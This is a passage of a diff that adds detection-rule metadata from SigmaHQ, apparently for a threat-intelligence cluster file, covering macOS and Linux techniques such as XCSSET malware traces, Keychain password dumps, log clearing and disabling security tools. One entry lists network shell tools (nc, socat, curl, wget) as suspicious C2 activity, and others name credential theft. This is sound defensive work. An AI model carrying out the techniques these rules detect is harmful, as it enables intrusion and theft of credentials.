+ "description": "Identifies the execution traces of the XCSSET malware. XCSSET is a macOS trojan that primarily spreads via Xcode projects and maliciously modifies applications. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_xcsset_malware_infection.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "47d65ac0-c06f-4ba2-a2e3-d263139d0f51", + "value": "Potential XCSSET Malware Infection" + }, + { + "description": "Detecting attempts to extract passwords with grep and laZagne", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_find_cred_in_files.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_find_cred_in_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "53b1b378-9b06-4992-b972-dde6e423d2b4", + "value": "Credentials In Files" + }, + { + "description": "Detects when a user manipulates with Firmward Password on MacOS. NOTE - this command has been disabled on silicon-based apple computers.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/09/30", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_susp_macos_firmware_activity.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", + "https://www.manpagez.com/man/8/firmwarepasswd/", + "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" + ], + "tags": [ + "attack.impact" + ] + }, + "uuid": "7ed2c9f7-c59d-4c82-a7e2-f859aa676099", + "value": "Suspicious MacOS Firmware Activity" + }, + { + "description": "Detect file time attribute change to hide new or changes to existing files", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_change_file_time_attr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.006/T1070.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_change_file_time_attr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.006" + ] + }, + "uuid": "88c0f9d8-30a8-4120-bb6b-ebb54abcf2a0", + "value": "File Time Attribute Change" + }, + { + "description": "Detects when a built-in utility is used to decode and decrypt a payload after a macOS disk image (DMG) is executed. Malware authors may attempt to evade detection and trick users into executing malicious code by encoding and encrypting their payload and placing it in a disk image file. This behavior is consistent with adware or malware families such as Bundlore and Shlayer.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_payload_decoded_and_decrypted.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-5d42c3d772e04f1e8d0eb60f5233bc79def1ea73105a2d8822f44164f77ef823", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_payload_decoded_and_decrypted.yml" + ], + "tags": [ + "attack.t1059", + "attack.t1204", + "attack.execution", + "attack.t1140", + "attack.defense_evasion", + "attack.s0482", + "attack.s0402" + ] + }, + "uuid": "234dc5df-40b5-49d1-bf53-0d44ce778eca", + "value": "Payload Decoded and Decrypted via Built-in Utilities" + }, + { + "description": "Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.", + "meta": { + "author": "remotephone", + "creation_date": "2021/11/20", + "falsepositive": [ + "Mistyped commands or legitimate binaries named to match the pattern" + ], + "filename": "proc_creation_macos_space_after_filename.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1036.006/T1036.006.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_space_after_filename.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.006" + ] + }, + "uuid": "b6e2a2e3-2d30-43b1-a4ea-071e36595690", + "value": "Space After Filename - macOS" + }, + { + "description": "Detects enumeration of local system groups", + "meta": { + "author": "Ömer Günal, Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_local_groups.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_groups.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "89bb1f97-c7b9-40e8-b52b-7d6afbd67276", + "value": "Local Groups Discovery - MacOs" + }, + { + "description": "Detects abuse of the cron utility to perform task scheduling for initial or recurring execution of malicious code. Detection will focus on crontab jobs uploaded from the tmp folder.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/06", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_schedule_task_job_cron.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_schedule_task_job_cron.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.003" + ] + }, + "uuid": "7c3b43d8-d794-47d2-800a-d277715aa460", + "value": "Scheduled Cron Task/Job - MacOs" + }, + { + "description": "Detects usage of base64 utility to decode arbitrary base64-encoded text", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_base64_decode.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027/T1027.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_base64_decode.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027" + ] + }, + "uuid": "719c22d7-c11a-4f2c-93a6-2cfdd5412f68", + "value": "Decode Base64 Encoded Text -MacOs" + }, + { + "description": "Detects the enumeration of other remote systems.", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/22", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_remote_system_discovery.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_remote_system_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1018" + ] + }, + "uuid": "10227522-8429-47e6-a301-f2b2d014e7ad", + "value": "Macos Remote System Discovery" + }, + { + "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "proc_creation_macos_split_file_into_pieces.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_split_file_into_pieces.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1030" + ] + }, + "uuid": "7f2bb9d5-6395-4de5-969c-70c11fbe6b12", + "value": "Split A File Into Pieces" + }, + { + "description": "Detects attempts to use system dialog prompts to capture user credentials", + "meta": { + "author": "remotephone, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Legitimate administration tools and activities" + ], + "filename": "proc_creation_macos_gui_input_capture.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://scriptingosx.com/2018/08/user-interaction-from-bash-scripts/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_gui_input_capture.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1056.002" + ] + }, + "uuid": "60f1ce20-484e-41bd-85f4-ac4afec2c541", + "value": "GUI Input Capture - macOS" + }, + { + "description": "Detects enumeration of local systeam accounts on MacOS", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/08", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_local_account.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.001/T1087.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_local_account.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087.001" + ] + }, + "uuid": "ddf36b67-e872-4507-ab2e-46bda21b842c", + "value": "Local System Accounts Discovery - MacOs" + }, + { + "description": "Detects the execution traces of the WizardUpdate malware. WizardUpdate is a macOS trojan that attempts to infiltrate macOS machines to steal data and it is associated with other types of malicious payloads, increasing the chances of multiple infections on a device.", + "meta": { + "author": "Tim Rauch (rule), Elastic (idea)", + "creation_date": "2022/10/17", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_macos_wizardupdate_malware_infection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", + "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "f68c4a4f-19ef-4817-952c-50dce331f4b0", + "value": "Potential WizardUpdate Malware Infection" + }, + { + "description": "Detects deletion of local audit logs", + "meta": { + "author": "remotephone, oscd.community", + "creation_date": "2020/10/11", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_clear_system_logs.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.002/T1070.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_clear_system_logs.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.002" + ] + }, + "uuid": "acf61bd8-d814-4272-81f0-a7a269aa69aa", + "value": "Indicator Removal on Host - Clear Mac System Logs" + }, + { + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", + "meta": { + "author": "Igor Fits, Mikhail Larin, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "proc_creation_macos_system_shutdown_reboot.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_system_shutdown_reboot.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ] + }, + "uuid": "40b1fbe2-18ea-4ee7-be47-0294285811de", + "value": "System Shutdown/Reboot - MacOs" + }, + { + "description": "Detects disabling security tools", + "meta": { + "author": "Daniil Yugoslavskiy, oscd.community", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate activities" + ], + "filename": "proc_creation_macos_disable_security_tools.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_disable_security_tools.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "ff39f1a6-84ac-476f-a1af-37fcdf53d7c0", + "value": "Disable Security Tools" + }, + { + "description": "Detects passwords dumps from Keychain", + "meta": { + "author": "Tim Ismilyaev, oscd.community, Florian Roth", + "creation_date": "2020/10/19", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_creds_from_keychain.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://gist.github.com/Capybara/6228955", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1555.001" + ] + }, + "uuid": "b120b587-a4c2-4b94-875d-99c9807d6955", + "value": "Credentials from Password Stores - Keychain" + }, + { + "description": "Detects the usage of tooling to sniff network traffic.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "meta": { + "author": "Alejandro Ortuno, oscd.community", + "creation_date": "2020/10/14", + "falsepositive": [ + "Legitimate administration activities" + ], + "filename": "proc_creation_macos_network_sniffing.yml", + "level": "informational", + "logsource.category": "process_creation", + "logsource.product": "macos", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_network_sniffing.yml" + ], + "tags": [ + "attack.discovery", + "attack.credential_access", + "attack.t1040" + ] + }, + "uuid": "adc9bcc4-c39c-4f6b-a711-1884017bf043", + "value": "Network Sniffing - MacOs" + }, + { + "description": "Before deploying any new asset, change all default passwords to have values consistent with administrative level accounts.\nSigma detects default credentials usage. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "default_credentials_usage.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "qualys", + "refs": [ + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" + ], + "tags": "No established tags" + }, + "uuid": "1a395cbc-a84a-463a-9086-ed8a70e573c7", + "value": "Default Credentials Usage" + }, + { + "description": "Host Without Firewall. Alert means not complied. Sigma for Qualys vulnerability scanner. Scan type - Vulnerability Management.", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/19", + "falsepositive": "No established falsepositives", + "filename": "host_without_firewall.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "qualys", + "refs": [ + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" + ], + "tags": "No established tags" + }, + "uuid": "6b2066c8-3dc7-4db7-9db0-6cc1d7b0dde9", + "value": "Host Without Firewall" + }, + { + "description": "Ensure that all account usernames and authentication credentials are transmitted across networks using encrypted channels\nEnsure that an encryption is used for all sensitive information in transit.\nEnsure that an encrypted channels is used for all administrative account access.\n", + "meta": { + "author": "Alexandr Yampolskyi, SOC Prime", + "creation_date": "2019/03/26", + "falsepositive": [ + "Unknown" + ], + "filename": "netflow_cleartext_protocols.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "No established product", + "refs": [ + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", + "https://www.cisecurity.org/controls/cis-controls-list/", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" + ], + "tags": "No established tags" + }, + "uuid": "7e4bfe58-4a47-4709-828d-d86c78b7cc1f", + "value": "Cleartext Protocol Usage Via Netflow" + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager.\nMicrosoft Azure, and Microsoft Operations Management Suite.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2021/09/17", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." + ], + "filename": "lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ] + }, + "uuid": "045b5f9c-49f7-4419-a236-9854fb3c827a", + "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd" + }, + { + "description": "Detects calls to hidden files or files located in hidden directories in NIX systems.", + "meta": { + "author": "David Burkett, @signalblur", + "creation_date": "2022/12/30", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_hidden_binary_execution.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_hidden_binary_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.001" + ] + }, + "uuid": "9e1bef8d-0fff-46f6-8465-9aa54e128c1e", + "value": "Use Of Hidden Paths Or Files" + }, + { + "description": "Detects file and folder permission changes.", + "meta": { + "author": "Jakob Weinzettl, oscd.community", + "creation_date": "2019/09/23", + "falsepositive": [ + "User interacting with files permissions (normal/daily behaviour)." + ], + "filename": "lnx_auditd_file_or_folder_permissions.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.002/T1222.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_file_or_folder_permissions.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1222.002" + ] + }, + "uuid": "74c01ace-0152-4094-8ae2-6fd776dd43e5", + "value": "File or Folder Permissions Change" + }, + { + "description": "Detect changes of syslog daemons configuration files", + "meta": { + "author": "Mikhail Larin, oscd.community", + "creation_date": "2019/10/25", + "falsepositive": [ + "Legitimate administrative activity" + ], + "filename": "lnx_auditd_logging_config_change.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "self experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_logging_config_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.006" + ] + }, + "uuid": "c830f15d-6f6e-430f-8074-6f73d6807841", + "value": "Logging Configuration Changes on Linux Host" + }, + { + "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2022/02/03", + "falsepositive": [ + "Admin work like legit service installs." + ], + "filename": "lnx_auditd_systemd_service_creation.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", + "https://attack.mitre.org/techniques/T1543/002/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.002" + ] + }, + "uuid": "1bac86ba-41aa-4f62-9d6b-405eac99b485", + "value": "Systemd Service Creation" + }, + { + "description": "detects BPFDoor .lock and .pid files access in temporary file storage facility", + "meta": { + "author": "Rafal Piasecki", + "creation_date": "2022/08/10", + "falsepositive": [ + "Unlikely" + ], + "filename": "lnx_auditd_bpfdoor_file_accessed.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", + "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" + ], + "tags": [ + "attack.execution", + "attack.t1106", + "attack.t1059" + ] + }, + "uuid": "808146b2-9332-4d78-9416-d7e47012d83d", + "value": "BPFDoor Abnormal Process ID or Lock File Accessed" + }, + { + "description": "Detects attempts to record audio with arecord utility", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/04", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_audio_capture.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://attack.mitre.org/techniques/T1123/", + "https://linux.die.net/man/1/arecord", + "https://linuxconfig.org/how-to-test-microphone-with-audio-linux-sound-architecture-alsa", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_audio_capture.yml" + ], + "tags": [ + "attack.collection", + "attack.t1123" + ] + }, + "uuid": "a7af2487-9c2f-42e4-9bb9-ff961f0561d5", + "value": "Audio Capture" + }, + { + "description": "Detecting attempts to extract passwords with grep", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/15", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_find_cred_in_files.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_find_cred_in_files.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.001" + ] + }, + "uuid": "df3fcaea-2715-4214-99c5-0056ea59eb35", + "value": "Credentials In Files - Linux" + }, + { + "description": "Adversaries may use binary padding to add junk data and change the on-disk representation of malware.\nThis rule detect using dd and truncate to add a junk data to file.\n", + "meta": { + "author": "Igor Fits, oscd.community", + "creation_date": "2020/10/13", + "falsepositive": [ + "Legitimate script work" + ], + "filename": "lnx_auditd_binary_padding.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_binary_padding.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.001" + ] + }, + "uuid": "c52a914f-3d8b-4b2a-bb75-b3991e75f8ba", + "value": "Binary Padding - Linux" + }, + { + "description": "Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/11", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_steghide_embed_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", + "https://attack.mitre.org/techniques/T1027/003/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ] + }, + "uuid": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", + "value": "Steganography Hide Files with Steghide" + }, + { + "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "Admin activity" + ], + "filename": "lnx_auditd_user_discovery.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_user_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", + "value": "System Owner or User Discovery" + }, + { + "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)\n", + "meta": { + "author": "Marie Euler", + "creation_date": "2020/05/18", + "falsepositive": [ + "Admin or User activity" + ], + "filename": "lnx_auditd_susp_c2_commands.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://github.com/Neo23x0/auditd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml" + ], + "tags": [ + "attack.command_and_control" + ] + }, + "uuid": "f7158a64-6204-4d6d-868a-6e6378b467e0", + "value": "Suspicious C2 Activities" + }, + { + "description": "Detects attempts to collect data stored in the clipboard from users with the usage of xclip tool.\nXclip has to be installed.\nHighly recommended using rule on servers, due to high usage of clipboard utilities on user workstations.\n", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/24", + "falsepositive": [ + "Legitimate usage of xclip tools" + ], + "filename": "lnx_auditd_clipboard_collection.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", + "https://linux.die.net/man/1/xclip", + "https://attack.mitre.org/techniques/T1115/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1115" + ] + }, + "uuid": "214e7e6c-f21b-47ff-bb6f-551b2d143fcf", + "value": "Clipboard Collection with Xclip Tool - Auditd" + }, + { + "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", + "meta": { + "author": "Pawel Mazur", + "creation_date": "2021/09/11", + "falsepositive": [ + "Unknown" + ], + "filename": "lnx_auditd_steghide_extract_steganography.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "linux", + "refs": [ + "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", + "https://attack.mitre.org/techniques/T1027/003/", + 